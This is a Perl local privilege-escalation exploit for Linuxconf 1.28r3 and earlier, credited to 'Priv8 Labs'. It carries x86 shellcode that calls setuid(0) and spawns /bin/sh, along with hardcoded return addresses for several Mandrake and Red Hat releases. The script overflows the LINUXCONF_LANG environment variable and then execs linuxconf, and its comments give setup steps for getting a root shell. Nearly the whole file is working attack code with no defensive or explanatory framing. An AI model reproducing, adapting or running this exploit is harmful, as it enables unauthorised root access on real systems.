#!/usr/bin/perl
####################################################################################
#Priv8 Labs Linuxconf version 1.28r3 and < local r00t exploit by wsxz.
#
#                   Before run this exploit do this things!!
#		   1- mkdir LINUXCONF_LANG.eng
#		   2- touch LINUXCONF_LANG.eng/LINUXCONF_LANG.eng
#		   3- run the exploit and get your root shell ;)
#
#     Greetz: coideloko, chroot-, xtc , lkm, M|ght, overkill, blood_sucker, execk, printf
#                 friends of Priv8 security.
#
#
####################################################################################


		    $shellcode =
                    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
		    "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
		    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
                    "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
                    "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
                    "\xff\xff/bin/sh";

		    $nop = "\x90"; # x86 NOP
                    $offset = 0; # Default offset to try.


     if (@ARGV == 1 || @ARGV == 2) {
                    $target = $ARGV[0];
                    $offset = $ARGV[1];
		    }else{
                    printf("!!! Priv8 Labs Linuxconf local root exploit by wsxz !!!\n");
		    printf("!!! usage: priv8lc.pl target !!!\n");
                    printf("List of targets:\n");
		    printf("      1 - Linux Mandrake 8.2 Linuxconf 1.27\n");
                    printf("      2 - Linux Mandrake 8.1 Linuxconf 1.26\n");
                    printf("      3 - Linux Mandrake 8.0 Linuxconf 1.25 (subrev 3) \n");
		    printf("      4 - Linux Redhat 7.3 Linuxconf 1.28 (subrev 1)\n");
		    exit(1);
		    }

     if ( $target eq "1" ) {
                   $retword = 0x08117097;
                   $retshell = 0xbfffd050 + $offset;
                   $aword = 10;
		    }
     if ( $target eq "2" ) {
                   $retword = 0x081184b7;
                   $retshell = 0xbfffe6b4 + $offset;
                   $aword = 10;
		    }
      if ( $target eq "3" ) {
                   $retword = 0x08114e9e;
                   $retshell = 0xbfffcbf4 + $offset;
                   $aword = 10;
		    }
       if ( $target eq "4" ) {
                   $retword = 0x08117f5e;
                   $retshell = 0xbfffcc3c + $offset;
                   $aword = 10;
		    }

		    printf("Using target number %d\n", $target);
                    printf("Using ret shellcode 0x%x\n",$retshell);
		    printf("Using ret word 0x%x\n",$retword);
		    $new_retword = pack('l', ($retword));
		    $new_retshell = pack('l', ($retshell));
#Make the buffer
                    $buffer2 = $nop x 900;
                    $buffer2 .= $shellcode;
		    $buffer2 .=$nop x 975;
                    $buffer2 .= $new_retword x $aword;
		    $buffer2 .= $new_retshell;
		    $buffer2 .= $new_retword x 30;
		    local($ENV{'LINUXCONF_LANG'}) = $buffer2; exec("/bin/linuxconf");